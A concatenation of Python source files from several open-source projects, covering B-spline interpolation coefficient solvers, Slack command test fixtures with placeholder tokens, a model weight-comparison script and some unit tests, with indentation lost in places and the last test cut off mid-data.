+ Phi2_1 * (coefs[i0 + 2, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 2, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 2, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 3, i2 + 3, k])
)
)
+ dPhi0_3
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 3, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 3, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 3, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 3, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 3, i2 + 3, k])
)
)
)
dvals[n, 1, k] = (
Phi0_0
* (
dPhi1_0
* (
Phi2_0 * (coefs[i0 + 0, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 0, i2 + 3, k])
)
+ dPhi1_1
* (
Phi2_0 * (coefs[i0 + 0, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 1, i2 + 3, k])
)
+ dPhi1_2
* (
Phi2_0 * (coefs[i0 + 0, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 2, i2 + 3, k])
)
+ dPhi1_3
* (
Phi2_0 * (coefs[i0 + 0, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 3, i2 + 3, k])
)
)
+ Phi0_1
* (
dPhi1_0
* (
Phi2_0 * (coefs[i0 + 1, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 0, i2 + 3, k])
)
+ dPhi1_1
* (
Phi2_0 * (coefs[i0 + 1, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 1, i2 + 3, k])
)
+ dPhi1_2
* (
Phi2_0 * (coefs[i0 + 1, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 2, i2 + 3, k])
)
+ dPhi1_3
* (
Phi2_0 * (coefs[i0 + 1, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 3, i2 + 3, k])
)
)
+ Phi0_2
* (
dPhi1_0
* (
Phi2_0 * (coefs[i0 + 2, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 0, i2 + 3, k])
)
+ dPhi1_1
* (
Phi2_0 * (coefs[i0 + 2, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 1, i2 + 3, k])
)
+ dPhi1_2
* (
Phi2_0 * (coefs[i0 + 2, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 2, i2 + 3, k])
)
+ dPhi1_3
* (
Phi2_0 * (coefs[i0 + 2, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 3, i2 + 3, k])
)
)
+ Phi0_3
* (
dPhi1_0
* (
Phi2_0 * (coefs[i0 + 3, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 0, i2 + 3, k])
)
+ dPhi1_1
* (
Phi2_0 * (coefs[i0 + 3, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 1, i2 + 3, k])
)
+ dPhi1_2
* (
Phi2_0 * (coefs[i0 + 3, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 2, i2 + 3, k])
)
+ dPhi1_3
* (
Phi2_0 * (coefs[i0 + 3, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 3, i2 + 3, k])
)
)
)
dvals[n, 2, k] = (
Phi0_0
* (
Phi1_0
* (
dPhi2_0 * (coefs[i0 + 0, i1 + 0, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 0, i1 + 0, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 0, i1 + 0, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 0, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
dPhi2_0 * (coefs[i0 + 0, i1 + 1, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 0, i1 + 1, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 0, i1 + 1, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 0, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
dPhi2_0 * (coefs[i0 + 0, i1 + 2, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 0, i1 + 2, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 0, i1 + 2, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 0, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
dPhi2_0 * (coefs[i0 + 0, i1 + 3, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 0, i1 + 3, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 0, i1 + 3, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 0, i1 + 3, i2 + 3, k])
)
)
+ Phi0_1
* (
Phi1_0
* (
dPhi2_0 * (coefs[i0 + 1, i1 + 0, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 1, i1 + 0, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 1, i1 + 0, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 1, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
dPhi2_0 * (coefs[i0 + 1, i1 + 1, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 1, i1 + 1, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 1, i1 + 1, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 1, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
dPhi2_0 * (coefs[i0 + 1, i1 + 2, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 1, i1 + 2, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 1, i1 + 2, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 1, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
dPhi2_0 * (coefs[i0 + 1, i1 + 3, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 1, i1 + 3, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 1, i1 + 3, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 1, i1 + 3, i2 + 3, k])
)
)
+ Phi0_2
* (
Phi1_0
* (
dPhi2_0 * (coefs[i0 + 2, i1 + 0, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 2, i1 + 0, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 2, i1 + 0, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 2, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
dPhi2_0 * (coefs[i0 + 2, i1 + 1, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 2, i1 + 1, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 2, i1 + 1, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 2, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
dPhi2_0 * (coefs[i0 + 2, i1 + 2, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 2, i1 + 2, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 2, i1 + 2, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 2, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
dPhi2_0 * (coefs[i0 + 2, i1 + 3, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 2, i1 + 3, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 2, i1 + 3, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 2, i1 + 3, i2 + 3, k])
)
)
+ Phi0_3
* (
Phi1_0
* (
dPhi2_0 * (coefs[i0 + 3, i1 + 0, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 3, i1 + 0, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 3, i1 + 0, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 3, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
dPhi2_0 * (coefs[i0 + 3, i1 + 1, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 3, i1 + 1, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 3, i1 + 1, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 3, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
dPhi2_0 * (coefs[i0 + 3, i1 + 2, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 3, i1 + 2, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 3, i1 + 2, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 3, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
dPhi2_0 * (coefs[i0 + 3, i1 + 3, i2 + 0, k])
+ dPhi2_1 * (coefs[i0 + 3, i1 + 3, i2 + 1, k])
+ dPhi2_2 * (coefs[i0 + 3, i1 + 3, i2 + 2, k])
+ dPhi2_3 * (coefs[i0 + 3, i1 + 3, i2 + 3, k])
)
)
)
vals = vals[:, 0]
dvals = dvals[:, :, 0]
# used by njitted routines (frozen)
basis = np.array([1.0 / 6.0, 2.0 / 3.0, 1.0 / 6.0, 0.0])
@njit(cache=True)
def solve_deriv_interp_1d(bands, coefs):
M = coefs.shape[0] - 2
# Solve interpolating equations
# First and last rows are different
bands[0, 1] /= bands[0, 0]
bands[0, 2] /= bands[0, 0]
bands[0, 3] /= bands[0, 0]
bands[0, 0] = 1.0
bands[1, 1] -= bands[1, 0] * bands[0, 1]
bands[1, 2] -= bands[1, 0] * bands[0, 2]
bands[1, 3] -= bands[1, 0] * bands[0, 3]
    bands[1, 0] = 0.0
bands[1, 2] /= bands[1, 1]
bands[1, 3] /= bands[1, 1]
bands[1, 1] = 1.0
# Now do rows 2 through M+1
for row in range(2, M + 1):
bands[row, 1] -= bands[row, 0] * bands[row - 1, 2]
bands[row, 3] -= bands[row, 0] * bands[row - 1, 3]
bands[row, 2] /= bands[row, 1]
bands[row, 3] /= bands[row, 1]
bands[row, 0] = 0.0
bands[row, 1] = 1.0
# Do last row
bands[M + 1, 1] -= bands[M + 1, 0] * bands[M - 1, 2]
bands[M + 1, 3] -= bands[M + 1, 0] * bands[M - 1, 3]
bands[M + 1, 2] -= bands[M + 1, 1] * bands[M, 2]
bands[M + 1, 3] -= bands[M + 1, 1] * bands[M, 3]
bands[M + 1, 3] /= bands[M + 1, 2]
bands[M + 1, 2] = 1.0
coefs[M + 1] = bands[(M + 1), 3]
# Now back substitute up
for row in range(M, 0, -1):
coefs[row] = bands[row, 3] - bands[row, 2] * coefs[row + 1]
# Finish with first row
coefs[0] = bands[0, 3] - bands[0, 1] * coefs[1] - bands[0, 2] * coefs[2]
@njit(cache=True)
def find_coefs_1d(delta_inv, M, data, coefs):
bands = np.zeros((M + 2, 4))
# Setup boundary conditions
abcd_left = np.zeros(4)
abcd_right = np.zeros(4)
# Left boundary
abcd_left[0] = 1.0 * delta_inv * delta_inv
abcd_left[1] = -2.0 * delta_inv * delta_inv
abcd_left[2] = 1.0 * delta_inv * delta_inv
abcd_left[3] = 0
# Right boundary
abcd_right[0] = 1.0 * delta_inv * delta_inv
abcd_right[1] = -2.0 * delta_inv * delta_inv
abcd_right[2] = 1.0 * delta_inv * delta_inv
abcd_right[3] = 0
for i in range(4):
bands[0, i] = abcd_left[i]
bands[M + 1, i] = abcd_right[i]
for i in range(M):
for j in range(3):
bands[i + 1, j] = basis[j]
bands[i + 1, 3] = data[i]
solve_deriv_interp_1d(bands, coefs)
@njit(cache=True)
def filter_coeffs_1d(dinv, data):
M = data.shape[0]
N = M + 2
coefs = np.zeros(N)
find_coefs_1d(dinv[0], M, data, coefs)
return coefs
@njit(cache=True)
def filter_coeffs_2d(dinv, data):
Mx = data.shape[0]
My = data.shape[1]
Nx = Mx + 2
Ny = My + 2
coefs = np.zeros((Nx, Ny))
# First, solve in the X-direction
for iy in range(My):
find_coefs_1d(dinv[0], Mx, data[:, iy], coefs[:, iy])
# Now, solve in the Y-direction
for ix in range(Nx):
find_coefs_1d(dinv[1], My, coefs[ix, :], coefs[ix, :])
return coefs
@njit(cache=True)
def filter_coeffs_3d(dinv, data):
Mx = data.shape[0]
My = data.shape[1]
Mz = data.shape[2]
Nx = Mx + 2
Ny = My + 2
Nz = Mz + 2
coefs = np.zeros((Nx, Ny, Nz))
    # First, solve in the X-direction
    for iy in range(My):
for iz in range(Mz):
find_coefs_1d(dinv[0], Mx, data[:, iy, iz], coefs[:, iy, iz])
# Now, solve in the Y-direction
for ix in range(Nx):
for iz in range(Mz):
find_coefs_1d(dinv[1], My, coefs[ix, :, iz], coefs[ix, :, iz])
# Now, solve in the Z-direction
for ix in range(Nx):
for iy in range(Ny):
find_coefs_1d(dinv[2], Mz, coefs[ix, iy, :], coefs[ix, iy, :])
return coefs
def filter_coeffs(smin, smax, orders, data):
smin = np.array(smin, dtype=float)
smax = np.array(smax, dtype=float)
dinv = (smax - smin) / orders
data = data.reshape(orders)
return filter_data(dinv, data)
def filter_data(dinv, data):
if len(dinv) == 1:
return filter_coeffs_1d(dinv, data)
elif len(dinv) == 2:
return filter_coeffs_2d(dinv, data)
elif len(dinv) == 3:
return filter_coeffs_3d(dinv, data)
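# The banded elimination above can be cross-checked against a dense solve. The
# sketch below (pure NumPy, no numba, illustrative only) assembles the same
# (M+2)x(M+2) system that find_coefs_1d builds -- interior rows apply the cubic
# B-spline stencil [1/6, 2/3, 1/6], boundary rows pin the second derivative to
# zero -- and verifies that the fitted spline reproduces the data at the knots.

```python
import numpy as np

def fit_cubic_coeffs_dense(data, delta_inv=1.0):
    M = data.shape[0]
    d2 = delta_inv * delta_inv
    A = np.zeros((M + 2, M + 2))
    b = np.zeros(M + 2)
    A[0, 0:3] = [d2, -2.0 * d2, d2]              # natural BC: c0 - 2*c1 + c2 = 0
    A[M + 1, M - 1:M + 2] = [d2, -2.0 * d2, d2]  # natural BC at the right edge
    for i in range(M):
        # interpolation condition: (c[i] + 4*c[i+1] + c[i+2]) / 6 == data[i]
        A[i + 1, i:i + 3] = [1.0 / 6.0, 2.0 / 3.0, 1.0 / 6.0]
        b[i + 1] = data[i]
    return np.linalg.solve(A, b)

data = np.sin(np.linspace(0.0, 3.0, 8))
c = fit_cubic_coeffs_dense(data)
# The spline value at knot i is the same stencil applied to the coefficients,
# so the fit interpolates the data exactly (up to round-off).
recon = (c[:-2] + 4.0 * c[1:-1] + c[2:]) / 6.0
assert np.allclose(recon, data)
```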
# --- slack/tests/data/commands.py (autoferrit/slack-sansio, MIT license) ---
from enum import Enum
no_text = {
"token": "supersecuretoken",
"team_id": "T000AAA0A",
"team_domain": "teamdomain",
"channel_id": "C00000A00",
"channel_name": "general",
"user_id": "U000AA000",
"user_name": "myuser",
"command": "/test",
"text": "",
"response_url": "https://hooks.slack.com/actions/T000AAA0A/123456789123/YTC81HsJRuuGSLVFbSnlkJlh",
"trigger_id": "000000000.0000000000.e1bb750705a2f472e4476c4228cf4784",
}
text = {
"token": "supersecuretoken",
"team_id": "T000AAA0A",
"team_domain": "teamdomain",
"channel_id": "C00000A00",
"channel_name": "general",
"user_id": "U000AA000",
"user_name": "myuser",
"command": "/test",
"text": "foo bar",
"response_url": "https://hooks.slack.com/actions/T000AAA0A/123456789123/YTC81HsJRuuGSLVFbSnlkJlh",
"trigger_id": "000000000.0000000000.e1bb750705a2f472e4476c4228cf4784",
}
class Commands(Enum):
"""
    List of available commands for testing
- text
- no_text
"""
text = text
no_text = no_text
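# A hypothetical sketch of how dict-valued Enum fixtures like Commands are
# consumed: iterating the enum yields the raw payload dicts, which is handy for
# parametrized tests. Payloads are trimmed here so the snippet is self-contained.

```python
from enum import Enum

no_text = {"command": "/test", "text": ""}
text = {"command": "/test", "text": "foo bar"}

class Commands(Enum):
    text = text
    no_text = no_text

# Enum members with unhashable (dict) values are allowed; lookup by value is
# simply linear. Iteration order follows definition order.
payloads = [member.value for member in Commands]
assert [p["text"] for p in payloads] == ["foo bar", ""]
assert all(p["command"] == "/test" for p in payloads)
```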
# --- diff_weights_with_pytorch.py (miemie2013/ppgan, Apache-2.0 license) ---
import torch
import paddle
import numpy as np
# ckpt_file = 'styleganv2ada_32_afhqcat.pdparams'
ckpt_file = 'styleganv2ada_32_afhqcat_step19_pytorch.pdparams'
state_dict_pytorch = paddle.load(ckpt_file)
def diff_weights(name, ckpt_file):
    """Print the per-key sum of squared differences between the Paddle
    checkpoint `ckpt_file` and the PyTorch-converted reference for the
    sub-model `name`."""
    print('======================== %s ========================' % name)
    model_dic_pytorch = {}
    for key, value in state_dict_pytorch[name].items():
        model_dic_pytorch[key] = value.numpy()
    state_dict = paddle.load(ckpt_file)
    model_dic_paddle = {}
    for key, value in state_dict.items():
        model_dic_paddle[key] = value.numpy()
    for key, value in model_dic_paddle.items():
        value2 = model_dic_pytorch[key]
        ddd = np.sum((value - value2) ** 2)
        print('diff=%.6f (%s)' % (ddd, key))
    print('==============================================')
    print()


# Step-0 checkpoints (e.g. 'D_00.pdparams') can be compared the same way.
diff_weights('discriminator', 'D_19.pdparams')
diff_weights('synthesis_ema', 'synthesis_ema_19.pdparams')
diff_weights('synthesis', 'synthesis_19.pdparams')
diff_weights('mapping_ema', 'mapping_ema_19.pdparams')
diff_weights('mapping', 'mapping_19.pdparams')
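# The per-key comparison above boils down to a sum of squared differences per
# weight tensor. A framework-agnostic sketch with plain NumPy dicts (the key
# names are illustrative, not from the checkpoints):

```python
import numpy as np

def weight_diffs(dic_a, dic_b):
    """Map each key of dic_a to the sum of squared differences of its tensors."""
    return {k: float(np.sum((dic_a[k] - dic_b[k]) ** 2)) for k in dic_a}

a = {"w": np.ones((2, 2)), "b": np.zeros(3)}
b = {"w": np.ones((2, 2)), "b": np.full(3, 0.1)}
diffs = weight_diffs(a, b)
assert diffs["w"] == 0.0               # identical tensors -> zero diff
assert abs(diffs["b"] - 0.03) < 1e-12  # 3 * 0.1**2
```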
# --- test/test_modify_group.py (Manolaru/Python_Study, Apache-2.0 license) ---
from model.group import Group
import random

import pytest


@pytest.mark.parametrize(
    "field, new_value",
    [("name", "NewGroup"), ("header", "NewHeader"), ("footer", "NewFooter")],
)
def test_modify_group_field(app, db, check_ui, field, new_value):
    if len(db.get_group_list()) == 0:
        app.group.create(Group(name="testing"))
    old_groups = db.get_group_list()
    group = random.choice(old_groups)
    list_index = old_groups.index(group)
    setattr(group, field, new_value)
    app.group.modify_group_by_id(group)
    new_groups = db.get_group_list()
    assert len(old_groups) == len(new_groups)
    old_groups[list_index] = group
    assert old_groups == new_groups
    if check_ui:
        new = sorted(new_groups, key=Group.id_or_max)
        ui = sorted(app.group.get_group_list(), key=Group.id_or_max)
        assert new == ui
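# The Group.id_or_max sort key assumed above is a common idiom: records that
# lack a database id sort last, so DB and UI lists line up after sorting. A
# minimal self-contained sketch (Rec and its fields are illustrative):

```python
import sys

class Rec:
    def __init__(self, id=None):
        self.id = id

    @staticmethod
    def id_or_max(rec):
        # real ids sort numerically; records without an id sort after everything
        return int(rec.id) if rec.id is not None else sys.maxsize

recs = [Rec(id=None), Rec(id=3), Rec(id=1)]
ordered = sorted(recs, key=Rec.id_or_max)
assert [r.id for r in ordered] == [1, 3, None]
```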
# --- src/match_pattern/utils/__init__.py (elsid/master, MIT license) ---
# coding: utf-8
from utils.cached_eq import cached_eq
from utils.cached_method import cached_method
# --- tests_rnn.py (Cyril-Grl/MuGen, MIT license) ---
# import src.VAE
#
# src.VAE.train()
# import src.train
import numpy as np
from src.data import get_drum
from src.models import get_model
model = get_model('src/rnn_10_classes.h5')
def classify_dir(path_template):
    """Predict the class of MIDI files 1..99 matching path_template and print them."""
    for i in range(1, 100):
        try:
            data = get_drum(path_template % i)
            prediction = model.predict(np.stack([data.astype(dtype=float)]))
            # class labels are just 0..10, so the argmax index is the prediction
            pred = int(np.argmax(prediction))
            print(f'{i} : {pred}')
        except Exception:
            pass


classify_dir('datasets/quantized_rythm_dataset/0/random_%d.mid')
classify_dir('datasets/quantized_rythm_dataset/100/generated_%d.mid')
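# The prediction step above reduces to an argmax over the model's 11-way
# output row; a tiny self-contained illustration with a fake probability vector:

```python
import numpy as np

prediction = np.array([[0.01] * 10 + [0.90]])  # fake softmax output, shape (1, 11)
index_max = int(np.argmax(prediction))
# indexing [0, 1, ..., 10] by the argmax (as above) is just the argmax itself
assert index_max == 10
```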
# --- tests/test_flairjsonnlp.py (dcavar/Flair-JSON-NLP, Apache-2.0 license) ---
from collections import OrderedDict
from unittest import TestCase
from pyjsonnlp import validation
from flairjsonnlp import FlairPipeline
from . import mocks
import pytest
text = "Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash."
def strip_scores(j):
"""Scores are non-deterministic"""
for s in j['documents'][1]['sentences']:
for label in s.get('labels', []):
label['scores']['label'] = 0
for e in j['documents'][1]['expressions']:
e['scores']['type'] = 0
for t in j['documents'][1]['tokenList']:
t['scores']['upos'] = 0
t['scores']['xpos'] = 0
t['scores']['entity'] = 0
if 'synsets' in t:
t['synsets'][0]['scores']['wordnetId'] = 0
class TestFlair(TestCase):
def test_process(self):
actual = FlairPipeline().process(text, fast=False, use_ontonotes=False)
assert isinstance(actual, OrderedDict) # can't decide on some of the pos tags...
# strip_scores(actual)
# expected = OrderedDict([('DC.conformsTo', 0.1), ('DC.source', 'Flair 0.4.1'), ('DC.created', '2019-01-25T17:04:34'), ('DC.date', '2019-01-25T17:04:34'), ('DC.creator', ''), ('DC.publisher', ''), ('DC.title', ''), ('DC.description', ''), ('DC.identifier', ''), ('DC.language', 'en'), ('conll', {}), ('documents', [OrderedDict([('text', 'Autonomous cars from the countryside of France shift insurance liability toward manufacturers. People are afraid that they will crash.'), ('tokenList', [{'id': 1, 'text': 'Autonomous', 'characterOffsetBegin': 0, 'characterOffsetEnd': 10, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADJ', 'xpos': 'JJ', 'entity_iob': 'O'}, {'id': 2, 'text': 'cars', 'characterOffsetBegin': 11, 'characterOffsetEnd': 15, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NNS', 'entity_iob': 'O'}, {'id': 3, 'text': 'from', 'characterOffsetBegin': 16, 'characterOffsetEnd': 20, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 4, 'text': 'the', 'characterOffsetBegin': 21, 'characterOffsetEnd': 24, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'DET', 'xpos': 'DT', 'entity_iob': 'O'}, {'id': 5, 'text': 'countryside', 'characterOffsetBegin': 25, 'characterOffsetEnd': 36, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 6, 'text': 'of', 'characterOffsetBegin': 37, 'characterOffsetEnd': 39, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 7, 'text': 'France', 'characterOffsetBegin': 40, 
'characterOffsetEnd': 46, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'PROPN', 'xpos': 'NNP', 'entity': 'S-LOC', 'entity_iob': 'B'}, {'id': 8, 'text': 'shift', 'characterOffsetBegin': 47, 'characterOffsetEnd': 52, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'VERB', 'xpos': 'VBP', 'entity_iob': 'O', 'synsets': [{'wordnetId': 'shift.v.01', 'scores': {'wordnetId': 0}}]}, {'id': 9, 'text': 'insurance', 'characterOffsetBegin': 53, 'characterOffsetEnd': 62, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 10, 'text': 'liability', 'characterOffsetBegin': 63, 'characterOffsetEnd': 72, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'NOUN', 'xpos': 'NN', 'entity_iob': 'O'}, {'id': 11, 'text': 'toward', 'characterOffsetBegin': 73, 'characterOffsetEnd': 79, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': {'SpaceAfter': 'Yes'}, 'upos': 'ADP', 'xpos': 'IN', 'entity_iob': 'O'}, {'id': 12, 'text': 'manufacturers.', 'characterOffsetBegin': 80, 'characterOffsetEnd': 94, 'features': {'Overt': 'Yes'}, 'scores': {'upos': 0, 'xpos': 0, 'entity': 0}, 'misc': 